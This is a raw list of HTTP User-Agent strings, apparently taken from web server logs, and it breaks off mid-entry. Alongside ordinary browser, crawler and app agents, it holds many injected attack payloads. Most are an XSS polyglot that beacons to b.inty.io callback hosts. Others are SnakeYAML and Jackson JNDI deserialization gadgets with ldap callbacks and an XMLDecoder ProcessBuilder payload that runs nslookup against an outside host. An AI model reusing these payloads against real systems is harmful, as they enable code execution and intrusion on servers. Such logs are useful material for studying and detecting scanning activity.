binlar@unspecified.mail +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 6.1; MSIE 9.11.9600.18952) +TulipChain/5.x (http://ostermiller.org/tulipchain/) Java/1.x.1_0x (http://java.sun.com/) Linux/2.4.17 +Feedshow/x.0 (http://www.feedshow.com; 1 subscriber) +WhatsApp/2.17.296 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/9lv24hhp8wxfyqkhq938akf4zv5x9l1cp7cx0m\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/m7ufqu32u9jsk36ucmplwx1hl8rzhn9ex9kz8o\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.207 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/in9n8znlrg8uy9cmqatk7lnstjzkv8nzbuykm9\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.246 A +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; QQDownload 534; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180605.140611 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36 PTST/180308.140322 +newspaper/0.2.7 +axios/0.16.2 +WordPress/4.9.2; https://www.aandelenzoeker.be +WhatsApp/2.18.195 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/wmm7po4rofycijsiurtmut79b0hrmfe621prdg\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.64 A +WhatsApp/2.17.431 A +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180907.120958 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 PTST/180228.210241 +WinHttp-Autoproxy-Service/5.1 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/g4llpx4j8epsf7tk78aioj4qahgfa32uqpdf14\.b.inty.io/).replace(/\\/g,[]))//'> +!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://pmfgpvcm9ynttqc6fx0589zx4oai48xwm.b.inty.io/"]]]] +Nutch Master Test/Dolphin-0.1-Beta +WordPress/4.7.3; https://eco.pt +WhatsApp/2.18.137 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ppiua6pstna10getshvr9spzvq1o5cx3ly8owd\.b.inty.io/).replace(/\\/g,[]))//'> +python-requests/2.6.0 CPython/2.7.5 Linux/4.1.12-124.15.4.el7uek.x86_64 +WhatsApp/2.18.206 A +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/180215.150235 +WordPress/4.9.6; https://emprestimoecreditofacil.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1527090336-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/637bon3974oiexsa6y98n93g97f0ao2fqad01p\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/q6xvr76taor2hhvu9icsqt60crioac23qydo1d\.b.inty.io/).replace(/\\/g,[]))//'> +Apache-HttpClient/4.5 (Java/1.8.0_171) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533123496-0 +uipcrawler/1.0 (uipcrawler@semasio.net) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/659bqn5994qigxua8yb8p95gb7hy8m0do8byzn\.b.inty.io/).replace(/\\/g,[]))//'> +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 6.0.1; Andromax_A26C4H ) U2/1.0.0 Mobile +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-42@moz.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/qmgj5yi69dywz7lyrq4pb1gl0c6c40wrkm7cv1\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536321839-0 +WordPress/4.9.5; http://saindodosufoco.com +WhatsApp/2.18.81 A +WordPress/4.9.2; https://www.elmundoentubolsillo.es +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/z664rg62axrbhqv39rc1q269c0iy8m0do8byzn\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.156 Android/7.0 Device/samsung-SM-J530F +JetBrains 4.0 Release Candidate 3 +WhatsApp/2.18.60 i +Apache-HttpClient/4.5 (Java/1.8.0_121) +WordPress/4.8.3; http://savacancies.com +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/171129.171147 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0; GomezAgent 3.0) Gecko/20100101 Firefox/38.0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ebt7um7uy1nkovamgetd0p59p0vx0lscg73xrm\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/45.0.2454.101 Safari/537.36 AppEngine-Google; ( http://code.google.com/appengine; appid: s~xxnet-2016ke) +python-requests/2.4.3 CPython/2.7.9 Linux/4.9.93-41.60.amzn1.x86_64 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/2117mj1550mectq64u74l51c73dx7lzcn7axym\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/7ltc6olap56jwyabozr95alhr8xa0yspgk3arz\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/hi3sl90ck0uxe4o3qcp7qe3u7ldch09rxmkc81\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.6; http://www.bancosdeportugal.info +WordPress/4.9.6; https://creditos-portugal.com +WordPress/4.9.3; https://www.pubaffairsbruxelles.eu +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531992331-0 +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 6.1; MSIE 9.11.9600.18349) +WordPress/4.9.1; https://www.cultuga.com.br +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/918emq1c57mlc0qd417blc1j7adef27tvoie63\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko GomezAgent 3.0) Chrome/56.0.2924.87 Safari/537.36 +WhatsApp/2.18.212 A +WhatsApp/2.18.10 i +Test Crawler/Nutch-2.3.1 +arquivo-web-crawler (compatible; heritrix/3.3.0-SNAPSHOT-2018-05-28T10:30:31Z http://arquivo.pt) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C) PTST/260 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1526541209-0 +WordPress/4.9.7; https://resgatefinanceiro.com.br +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/osktd5srwmd03fhsvgyqcrsyyp4i76zxnsaiy7\.b.inty.io/).replace(/\\/g,[]))//'> +python-requests/1.2.3 CPython/2.7.12 Linux/4.9.62-21.56.amzn1.x86_64 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529967116-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530716941-0 +Apache-HttpClient/4.5.2 (Java/1.8.0_162) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) +!!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding ["foo", !!javax.naming.Reference [foo, "Freddy", "http://co43rie9blpgvdethk2saw1k6bc4b41sq.b.inty.io/"], !!org.apache.xbean.naming.context.WritableContext []]] +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533505374-0 +WhatsApp/0.2.6968 N +WordPress/4.9.6; http://bestdownloadfilescatalog.us +Iframely/1.2.2 ( https://iframely.com/;) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528155213-0 +WhatsApp/2.18.44 W +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 PTST/180313.180300 +WordPress/4.9.5; http://anobrasilportugal.blog.br +GoogleEarth/7.3.2.5481(Windows;Microsoft Windows (6.1.7601.1);pt-PT;kml:2.2;client:Pro;type:default) +LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/3.1 http://www.linkedin.com)/1.0 (LinkedInBot; https://www.linkedin.com/; wkrupa@linkedin.com) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524537683-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523530530-0 +WhatsApp/2.18.151 A +VSE/1.0 (SimmeringStephenA@JohnDeere.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/r2uwn82u6pn3dirv5j8tmu218ses4gw7k27svh\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.7; http://likely.club +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/52.0.2743.116 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~loveq505) +WordPress/4.9.5; https://www.doutorfinancas.pt +WordPress/4.9.6; https://turistaprofissional.com +RSSOwl/1.2.4 Preview Release 2007-04-15 (Windows; U; zhtw) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/mj9f2uf269vsw3iuom1l8xdhx83c30vrjm6cu1\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/604bln0944libxpa3y68k90g67cz6nyem99zxo\.b.inty.io/).replace(/\\/g,[]))//'> +python-requests/2.7.0 CPython/2.7.0 Windows/post2008Server +WhatsApp/2.18.24 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524745315-0 +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C) PTST/402 +WordPress/4.7.5; http://umbigomagazine.com/pt +SVN/1.9.5 (x64-microsoft-windows) serf/1.3.9 TortoiseSVN-1.9.5.27581 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/vxwog3tbki91acw32vfum6rqbhhja72yqtdj18\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 6.1; MSIE 9.11.9600.18893) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/86cdrp6ba6rkhzvc90caqb6ic9i1ep6gubh15q\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/tmjy7amwqr75xkbxplsv6wm3suyyzmrdf82yqn\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/zz24kgz23xkbaqo32r51j2z950by9m1dp8cy0n\.b.inty.io/).replace(/\\/g,[]))//'> +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-crawl-production-crawler-43@moz.com) +OSSProxy 1.3.337.418 (Build 337.418 Win32 en-us)(Jul 30 2018 18:33:57) +WhatsApp/2.18.185 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1525694221-0 +WordPress/4.9.6; https://www.solicitarcartaodecredito.com +WordPress/4.9.1; https://moraremportugal.com +PycURL/7.43.0 libcurl/7.49.0 WinSSL zlib/1.2.8 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535033373-0 +WhatsApp/2.17.262 W +Open Web Analytics Bot 1.6.1 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/r3vwo83u7po3eisv6j9tnu319sfv8j0ao5bvzk\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.5; https://www.elmundoentubolsillo.es +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 PTST/180126.140108 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/w1y1md1z5um8cnq04o7ylz167xd1ipagybl19q\.b.inty.io/).replace(/\\/g,[]))//'> +!!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding ["foo", !!javax.naming.Reference [foo, "Freddy", "http://rojirxeob0pvvse8hz27ab1z6qck6a2yr.b.inty.io/"], !!org.apache.xbean.naming.context.WritableContext []]] +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/xpq2aep0tva90oe1spvz90p7vy1tuhm8a3xtli\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; Shuame) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/180406.130428 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605046-0 +WordPress/4.9; http://www.flotte2.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1525207911-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/5gmgah40qfz3y87y25tp6mboqfwak2bq6dw1l\.bcs.integrity.pt/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/izlnkzzl3gkua9om2a5kjlzs5jbaz2qqldb10\.b.inty.io/).replace(/\\/g,[]))//'> +set: ? !!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], "ldap://v51m81vss46zcwvcy3jbrfi3nutlykz8o.b.inty.io/"]] +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/rqlwb8quupb31ifvtjwtauq1ws2wxkpbd60wol\.b.inty.io/).replace(/\\/g,[]))//'> +LWP::Simple/6.15 libwww-perl/6.15 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/bydgjsye29jn92nf134dieyl4ca68u0logb6zv\.b.inty.io/).replace(/\\/g,[]))//'> +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 7.1.1; CPH1725 ) U2/1.0.0 Mobile +WordPress/4.9.6; http://novamagazine.pt +python-requests/2.5.3 CPython/2.6.6 Linux/2.6.32-431.el6.x86_64 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/sws3zkenyb88sf2e4n3i4ph5lwrnff631qreg\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533153461-0 +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 6.0; MSIE 9.0.8112.16421) +WhatsApp/2.18.252 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/lh6e0td148tru2gtmlzk6wbgv71b0zsqgl3br0\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.17.417 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/kbzpw1bnfiwwmb0oechmvnbuhlnih69xxski87\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/6bibwnb9f4wimx0aeyh8v9bgh7nafy7pvkia6z\.b.inty.io/).replace(/\\/g,[]))//'> +Apache-HttpClient/4.4.1 (Java/1.8.0_144) +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML like Gecko) Chrome/45.0.2454.101 Safari/537.36 AppEngine-Google; ( http://code.google.com/appengine; appid: s~scjynao7) +<?xml version="1.0" encoding="UTF-8"?><java version="1.8.0_40" class="java.beans.XMLDecoder"><new class="java.lang.ProcessBuilder"><string>nslookup</string><string>8r0zueh5ehscy9hpkg5ods4g97f272vr.b.inty.io</string><method name="start" /></new></java> +WordPress/4.9.1; http://www.bcsdportugal.org +WordPress/4.7.8; http://isiszimmerman.com +WordPress.com; https://thugalifebr.wordpress.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531992333-0 +WhatsApp/2.18.105 Android/7.0 Device/motorola-Moto_G_(5)_Plus +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524069891-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 PTST/180703.150705 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1525112300-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/7muc7omaq57jxybbpzs96amhs8y4wsojcez4nt\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/7w4chowa05hj7ylbzz29gawh2881ap2gqbd11q\.b.inty.io/).replace(/\\/g,[]))//'> +Python/3.5 aiohttp/2.0.2 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/bgvg1sgek91nr25fj3md0eglmcsfr3ju7pufi4\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.202 Android/6.0.1 Device/asus-ASUS_Z00AD +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/84adpp4b86pkfztc70aaob4ia9geh29txoke83\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528660696-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1526460045-2 +<?xml version="1.0" encoding="UTF-8"?><java version="1.8.0_40" class="java.beans.XMLDecoder"><new class="java.lang.ProcessBuilder"><string>nslookup</string><string>fyh61loclozj5gowrncvkzbngem8gydm2.b.inty.io</string><method name="start" /></new></java> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/0opt78kgbn061hn8t06zdbiv2m8e72ztnoaey3\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1532023548-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/y65rp62etli4jf56byoxv90tkkqjj7byztmja8\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524751377-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/n9xsu49qdluzkeyrcffptq9xfolfk3cu0pnfb4\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (vBSEO; http://www.vbseo.com) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524745324-0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 757; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/onfh6wj4abzu05mwso5nczhj1a7acy4pskfa3z\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/at73cipqgx5g6rsiyab9iln57wdn3jrbizdm3as\.b.inty.io/).replace(/\\/g,[]))//'> +Screaming Frog SEO Spider/10.0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 734) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0 glindahl-cocrawler/0.1.5.dev281 g8db2f00.d20180110 ( http://www.pbm.com/~lindahl/glindahl-cocrawler.html) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523631791-0 +WordPress/4.7.8; https://tipyfamilyblog.pt +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529967117-0 +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 691; .NET CLR 2.0.50727; InfoPath.2) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/5jpy2dfl6svbwmido5148gd0xr3itah28q3dt1i\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/4w19hlw702hg7vl8zw26g7we258z0nseg93zro\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528032821-0 +Mozilla/6.0 (compatible; Amiga-AWeb) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530613957-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/vcbov38bzio1pcb3hvuu166qqhwlr9j07vulia\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528815988-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/lc1evt81z8orp2bthluk1w6gq7w70vsmgh37rw\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531758101-0 +yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_151; Europe/de) http://yacy.net/bot.html +WordPress/4.9.1; http://kenobi/www.aurigaspa.com/wordpress +Shareaza v1.x.x.xx +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/cwc5fkssjz8i9tvk1ceblnq7ayg2eq6huch25r\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/y769aqpt9hje3ldkfteofvsbw22yqqhec12pr\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; GoogleToolbar 7.4.3607.2246; Windows 6.1; MSIE 8.0.7601.17514) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/tfcmy1b92grzsae1ktxs449otfzew2otcozen3\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/fk3k5wkiod5rv69jn7qh4ikpqgw8xwpndi08ox\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530274897-0 +["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://p5vg8vvmsy6tcqv6yxj5r9ixnotfybyzn.b.inty.io/"]}],"adviceBeanName":"ldap://p5vg8vvmsy6tcqv6yxj5r9ixnotfybyzn.b.inty.io/"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]] +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/m0nfjuw2n9csd3zu5milpxuhe8k8cw4nsif83x\.b.inty.io/).replace(/\\/g,[]))//'> +python-requests/2.6.0 CPython/2.7.14 Linux/4.14.51-66.38.amzn2.x86_64 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/165up92htoi7ji59b1o0vc0wknqhl5dw1rohc6\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; QQDownload 769; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Shuame; SE 2.X MetaSr 1.0) +WordPress/4.3.15; http://braincounts.pt/website +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/cbrne4t7dvns7zhyj7i2j9wp0g692xuoij59ty\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.17.429 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529967119-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530259966-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/dev6xlat10qjrudljdwc3o88szytxhp8d30toi\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.4; http://bomdia.eu +Mozilla/5.0 (X11; Linux x86_64; rv:54.0; GTmetrix https://gtmetrix.com/) Gecko/20100101 Firefox/54.0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/7u2cfouay5fj5yjbxz09eauh0865wtokcfz5nu\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] 